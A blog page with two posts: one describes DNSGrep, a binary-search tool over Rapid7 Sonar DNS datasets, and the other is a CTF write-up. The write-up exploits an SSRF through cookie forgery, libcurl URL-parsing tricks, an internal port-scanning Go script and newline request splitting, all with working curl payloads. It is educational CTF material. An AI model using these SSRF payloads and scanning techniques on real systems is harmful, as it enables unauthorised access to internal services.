DNSGrep — Quickly Searching Large DNS Datasets

The Rapid7 Project Sonar datasets are amazing resources. They represent scans across the internet, compressed and easy to download. This blog post will focus on two of these datasets:

https://opendata.rapid7.com/sonar.rdns_v2/ (rdns)
https://opendata.rapid7.com/sonar.fdns_v2/ (fdns_a)

Unfortunately, working with these datasets can be a bit slow as the rdns and fdns_a datasets each contain over 10GB of compressed text. My old workflow for using these datasets was not efficient:

ubuntu@client:~$ time gunzip -c fdns_a.json.gz | grep "erbbysam.com"
{"timestamp":"1535127239","name":"blog.erbbysam.com","type":"a","value":"54.190.33.125"}
{"timestamp":"1535133613","name":"erbbysam.com","type":"a","value":"104.154.120.133"}
{"timestamp":"1535155246","name":"www.erbbysam.com","type":"cname","value":"erbbysam.com"}
real 11m31.393s
user 12m29.212s
sys 1m37.672s

I suspected there had to be a faster way of searching these two datasets.

(TLDR, reverse and sort domains then binary search)

DNS Structure

A defining features of the DNS system is its tree-like structure. Visiting this page, you are three levels below the root domain:

com
com.erbbysam
com.erbbysam.blog

The grep query above looks for a domain name tied to the root domain, not an arbitrary string in the file. If we could shape our dataset into a DNS tree, an equivalent lookup would just require a quick traversal of this tree.

Binary Search

The task of transforming a large dataset into a tree on disk and traversing this tree can be simplified further using a binary search algorithm.

The first step in using a binary search algorithm is to sort the data. One option, matching for format above, is the form “com.erbbysam.blog”. This would require a slightly more complex DNS reversal algorithm than neccessary. To simplify, reverse each line instead:

moc.masybbre.golb,521.33.091.4
moc.masybbre,331.021.451.40
moc.masybbre.www,moc.masybbre

There are no one-command solutions to sort a dataset that does not fit into memory (that I am aware of). To sort these large files, split the data into sorted chunks and then merge the results together:

# fetch the fdns_a file
wget -O fdns_a.gz https://opendata.rapid7.com/sonar.fdns_v2/2019-01-25-1548417890-fdns_a.json.gz

# extract and format our data
gunzip -c fdns_a.gz | jq -r '.value + ","+ .name' | tr '[:upper:]' '[:lower:]' | rev > fdns_a.rev.lowercase.txt

# split the data into chunks to sort
# via https://unix.stackexchange.com/a/350068 -- split and merge code
split -b100M fdns_a.rev.lowercase.txt fileChunk

# remove the old files
rm fdns_a.gz
rm fdns_a.rev.lowercase.txt

# Sort each of the pieces and delete the unsorted one
# via https://unix.stackexchange.com/a/35472 -- use LC_COLLATE=C to sort ., chars
for f in fileChunk*; do LC_COLLATE=C sort "$f" > "$f".sorted && rm "$f"; done

# merge the sorted files with local tmp directory
mkdir -p sorttmp
LC_COLLATE=C sort -T sorttmp/ -muo fdns_a.sort.txt fileChunk*.sorted

# clean up
rm fileChunk*

More detailed instructions for running this script and the rdns equivalent can be found here:
https://github.com/erbbysam/DNSGrep#run

DNSGrep

Now we can search the data! To accomplish this, I built a simple golang utility that can be found here:
https://github.com/erbbysam/DNSGrep

ubuntu@client:~$ ls -lath fdns_a.sort.txt
-rw-rw-r-- 1 ubuntu ubuntu 68G Feb  3 09:11 fdns_a.sort.txt
ubuntu@client:~$ time ./dnsgrep -f fdns_a.sort.txt -i "erbbysam.com"
104.154.120.133,erbbysam.com
54.190.33.125,blog.erbbysam.com
erbbysam.com,www.erbbysam.com

real    0m0.002s
user    0m0.000s
sys    0m0.000s

That is significantly faster!

The algorithm is pretty simple:

  1. Use a binary search algorithm to seek through the file, looking for a substring match against the query.
  2. Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.
  3. Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.

PoC

PoC disclaimer: There is no uptime/performance guarantee of this service and I likely will take this offline at some point in the future. Keep in mind that the datasets here are from a scan on 1/25/19 — DNS records may have changed by the time you read this.

As these queries are so quick, I set up an AWS EC2 t2.micro instance with a spinning disk (Cold HDD sc1) and hosted a server that allows queries into these datasets:
https://github.com/erbbysam/DNSGrep/tree/master/experimentalServer

https://dns.bufferover.run/dns?q=erbbysam.com

ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=erbbysam.com' 
{
	"Meta": {
		"Runtime": "0.000361 seconds",
		"Errors": [
			"rdns error: failed to find exact match via binary search"
		],
		"FileNames": [
			"2019-01-25-1548417890-fdns_a.json.gz",
			"2019-01-30-1548868121-rdns.json.gz"
		],
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	},
	"FDNS_A": [
		"104.154.120.133,erbbysam.com",
		"54.190.33.125,blog.erbbysam.com",
		"erbbysam.com,www.erbbysam.com"
	],
	"RDNS": null
}

Having a bit of fun with this, I queried every North Korean domain name, grepping for the IPs not in North Korean IP space:
https://dns.bufferover.run/dns?q=.kp

 ubuntu@client:~$ curl 'https://dns.bufferover.run/dns?q=.kp' 2> /dev/null | grep -v "\"175\.45\.17"
{
	"Meta": {
		"Runtime": "0.000534 seconds",
		"Errors": null,
		"FileNames": [
			"2019-01-25-1548417890-fdns_a.json.gz",
			"2019-01-30-1548868121-rdns.json.gz"
		],
		"TOS": "The source of this data is Rapid7 Labs. Please review the Terms of Service: https://opendata.rapid7.com/about/"
	},
	"FDNS_A": [
		"175.45.0.178,ns1.portal.net.kp",
	],
	"RDNS": [
		"185.33.146.18,north-korea.kp",
		"66.23.232.124,sverjd.ouie.kp",
		"64.86.226.78,ns2.friend.com.kp",
		"103.120.178.114,dedi.kani28test.kp",
		"198.98.49.51,gfw.kp",
		"185.86.149.212,hey.kp"
	]
}

That’s it! Hopefully this was useful! Give it a try: https://dns.bufferover.run/dns?q=<hostname>

H1-212 CTF

As with most problems in the world, this one started with a tweet:

Let’s find that flag!

TLDR


# step 0
curl -v http://104.236.20.43/
# step 1 
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org'
# step 2
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes'
# step 3
curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
# step 4
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
# step 5
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
#step 6 
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337 @212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7
curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
curl -s http://104.236.20.43/read.php?id=(RETURNED ID - 1) -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
# step 7, output
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Or if you would prefer a tweet sized solution:

H="Host: admin.acme.org";B="admin=yes";curl 104.236.20.43/read.php?id=$(expr $(curl 104.236.20.43/index.php -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

But I digress. Still here? Cool, lets find this flag and document the snags I hit along the way.

Step 1 — Virtual hosting

http://104.236.20.43/ greets us with a default Ubuntu install:

default

This is the last time we will use our web browser for this CTF (curl time!)!

From the originally tweet & blog post — we know to search for an “admin” interface on 104.236.20.43. We should check for “admin” hostnames for sites hosted (and paths, see setback 1 below) on the same server. This technique of hosting multiple sites behind the same IP/port is called name-based virtual hosting.

Checking any hostname returns the Apache2 Ubuntu default page, with the exception of admin.acme.org:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org'
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Fri, 17 Nov 2017 23:30:19 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: admin=no
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

For admin.acme.org we are provided a blank page and a cookie “admin=no”!

Setback 1.a — Brute force

Executing a brute force scan of the root directory returns nothing exciting, except a fake flag http://104.236.20.43/flag

DNS or other related recon methods will not work as the public acme.org is not associated with this machine.

Step 2 — admin=yes

If we try a few values for the admin cookie, we find the only value that returns anything other than a HTTP 200 return code is “admin=yes”:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes'
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> GET / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
> 
< HTTP/1.1 405 Method Not Allowed
< Date: Sat, 18 Nov 2017 00:25:51 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

At this point, we have a server returning a 405, which is not terribly exciting. At least there were no setbacks with this step 🙂

Step 3 — What is a 405?

A HTTP 405 response is defined as:

The 405 (Method Not Allowed) status code indicates that the method
received in the request-line is known by the origin server but not
supported by the target resource. The origin server MUST generate an
Allow header field in a 405 response containing a list of the target
resource’s currently supported methods.

An HTTP Method refers to the verb sent by the client, in the above case this was “GET”, however there are many options available. The only method that returns anything different is POST, which can be observed returning a 406 error:

ubuntu@client:~$ curl -v http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST
*   Trying 104.236.20.43...
* TCP_NODELAY set
* Connected to 104.236.20.43 (104.236.20.43) port 80 (#0)
> POST / HTTP/1.1
> Host: admin.acme.org
> User-Agent: curl/7.54.0
> Accept: */*
> Cookie: admin=yes
> 
< HTTP/1.1 406 Not Acceptable
< Date: Sat, 18 Nov 2017 00:37:46 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 

Aside — HTTP OPTIONS

An OPTIONS method with a * request target returns an list of allowed methods:

ubuntu@client:~$ curl -v http://104.236.20.43/* -H 'Host: admin.acme.org' --cookie 'admin=yes' -X OPTIONS 2>&1 | grep Allow
< Allow: GET,HEAD,POST,OPTIONS

Setback 3.a — 405 vs 406

I spent hours trying other HTTP methods as I did not notice that the POST request type returned a 406.

Step 4 — What is a 406?

Noticing a theme here yet? 🙂

A HTTP 406 response is defined as:

The 406 (Not Acceptable) status code indicates that the target
resource does not have a current representation that would be
acceptable to the user agent, according to the proactive negotiation
header fields received in the request (Section 5.3), and the server
is unwilling to supply a default representation.

A 406 typically refers to the Accept headers sent by a client (see setback 4.a). In our case, since we are sending a POST request which generally contains data, the server is complaining that our data is not correctly formatted. If we send a request with a content type “application/json”, we receive this response:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json"
{"error":{"body":"unable to decode"}}

By adding some data, we see that we are missing a domain field:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{}'
{"error":{"domain":"required"}}

These errors actually come in as 418 teapot responses 🍵🍵🍵.

Setback 4.a — Accept all the things

As I thought the 406 header indicated something was missing from my “Accept” HTTP header (implying */* was not acceptable), I spent far too long gathering different acceptable Accept media types.

Step 5 — Domains

Sending domain requests allows us to ascertain the rules regarding the domain that must be followed:

  1. The domain must match the regex .*212.*\..*\.com for example 212.h.com and abc212abc.abc.com are both valid
  2. The domain cannot contain the characters: ? & \ % #
  3. The domain is parsed by php libcurl

To put this into practice, let’s send a sample request (which will GET / from 212.erbbysam.com). Note that this is a 2 step process:


ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"212.erbbysam.com"}'
{"next":"\/read.php?id=2150"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=2150 -H 'Host: admin.acme.org' --cookie 'admin=yes'
{"data":"(base64 data removed)"}

Rule 3 above becomes obvious when the string “localhost:22 @212.example.com” is provided as a domain:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:22 @212.example.com"}'
{"next":"\/read.php?id=97"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=97 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
Protocol mismatch.

That string may look familiar as it is very similar to php libcurl issues that were observed in one of the best talks to come out of Vegas this year (besides my own 🙂 ) – https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf

Aside — Tornado black hole

Hosting a simple python tornado server at 212.erbbysam.com allowed me to reason about what the server’s code actually looked like by observing the requests coming in:

import tornado.ioloop
import tornado.web

class MainHandler(tornado.web.RequestHandler):
    def get(self):
        print self.request

def make_app():
    return tornado.web.Application([
        (r"/.*", MainHandler),
    ])

if __name__ == "__main__":
    app = make_app()
    app.listen(80)
    tornado.ioloop.IOLoop.current().start()

Step 6 — Internal network scan

Suspecting that pivoting to something only accessible locally was the next step (while trying all the things™), I setup a simple Go executable to scan every port accessible (similar to port 22 above):

package main

import "fmt"
import "os/exec"
import "strings"
import "strconv"

func Cmd(cmd string) []byte {
    out, err := exec.Command("bash", "-c", cmd).Output()
    if err != nil {
        fmt.Printf("error -- %s\n", cmd)
    }
    return out
}

func main() {
    port := 0
    for port < 65535 {
        fmt.Printf("%d -- ", port)
        cmd := fmt.Sprintf("curl http://admin.acme.org/index.php --header 'Host: admin.acme.org' --cookie 'admin=yes' -v -X POST -d '{\"domain\":\"localhost:%d @212.example.com\"}' -H 'Content-Type: application/json' --max-time 10 ", port)
        out := string(Cmd(cmd))
        out =  strings.TrimLeft(strings.TrimRight(out,"\"}"),"{\"next\":\"\\/read.php?id=")
        num_out, err := strconv.Atoi(out)

        if err == nil {
            cmd = fmt.Sprintf("curl http://104.236.20.43/read.php?id=%d --header 'Host: admin.acme.org' --cookie \"admin=yes\" -v --max-time 10 " ,num_out)
            out = string(Cmd(cmd))
            fmt.Println(out)

        } else {
                fmt.Println("invalid")
        }
        port = port + 1
    }
}

Running this code only produced a few interesting hits:

ubuntu@client:~/go/scan$ go run test.go
...
22 -- {"data":"U1NILTIuMC1PcGVuU1NIXzcuMnAyIFVidW50dS00dWJ1bnR1Mi4yDQpQcm90b2NvbCBtaXNtYXRjaC4K"} (SSH example above)
53 -- error (local dns server)
80 -- {"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQ... (default ubuntu page)
1337 -- {"data":"SG1tLCB3aGVyZSB3b3VsZCBpdCBiZT8K"} ("Hmm, where would it be?")

The 1337 port appears to be running an http server (and it’s hinting that we’re getting close)!

Step 7 — Reaching /flag on 1337

This part is a bit tricky. An intentional “bug” in the domain parsing script meant that a \n character would split a request into 2 separate reads (incrementing the read.php ID 2x). To demonstrate this, I will make two consecutive calls with a \n:

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:80/\n212.h.com"}'
{"next":"\/read.php?id=2139"}
ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/\n212.example.com"}'
{"next":"\/read.php?id=2141"}

In this case read.php?id=2140 will access “localhost:1337/” while read.php?id=2141 will access “212.example.com”. This allows us to access localhost:1337/flag and grab our flag while still satisfying the domain rules from step 5!

ubuntu@client:~$ curl http://104.236.20.43/ -H 'Host: admin.acme.org' --cookie 'admin=yes' -X POST -H "Content-Type: application/json" -d '{"domain":"localhost:1337/flag\n212.example.com"}'
{"next":"\/read.php?id=2143"}
ubuntu@client:~$ curl -s http://104.236.20.43/read.php?id=2142 -H 'Host: admin.acme.org' --cookie 'admin=yes' | jq -r  '.data' | base64 -d
FLAG: CF,2dsV\/]fRAYQ.TDEp`w"M(%mU;p9+9FD{Z48X*Jtt{%vS($g7\S):f%=P[Y@nka=<tqhnF<aq=K5:BC@Sb*{[%z"+@yPb/nfFna<e$hv{p8r2[vMMF52y:z/Dh;{6

Setback 7.a — Unicode characters

Using the python tornado server above, I observed that any unicode character (as \uXXXX where X is a hex character) could be passed through the server (with the exception of the character list in part 5). This is due to the use of json encoding, but was entirely unused here.

Setback 7.b — \n

I could not figure out why my request would disappear when a \n was passed in (no error appeared and no domain was contacted). My breakthrough here came when I tried the domain “212.erbbysam.com:80/flag\n212.erbbysam.com” and a GET / was accessed by the ID that was returned, I then noticed the ID had incremented twice (1st ID would GET /flag, 2nd ID — the value returned — would get /).

Conclusion

In conclusion, never stop trying all the things™ and always be on the lookout for interesting papers and presentations (I’m not sure if I would have finished this without knowing about that Black Hat URL parser presentation).

Taking the curl requests from step 7, creating a few temporary bash variables and changing “localhost” to “0” we reduce this CTF to proper tweet form (277 characters):

H="Host: admin.acme.org";B="admin=yes";curl 104.236.20.43/read.php?id=$(expr $(curl 104.236.20.43/index.php -s -H "$H" -b "$B" -d '{"domain":"0:1337/flag\n212.h.com"}' -H "Content-Type: application/json"|sed 's/.*=\(.*\)\"}/\1/') - 1) -s -H "$H" -b "$B"|jq -r '.data'|base64 -d

Huge shout-out to @NahamSec and @jobertama for this awesome challenge & thanks for reading 🙂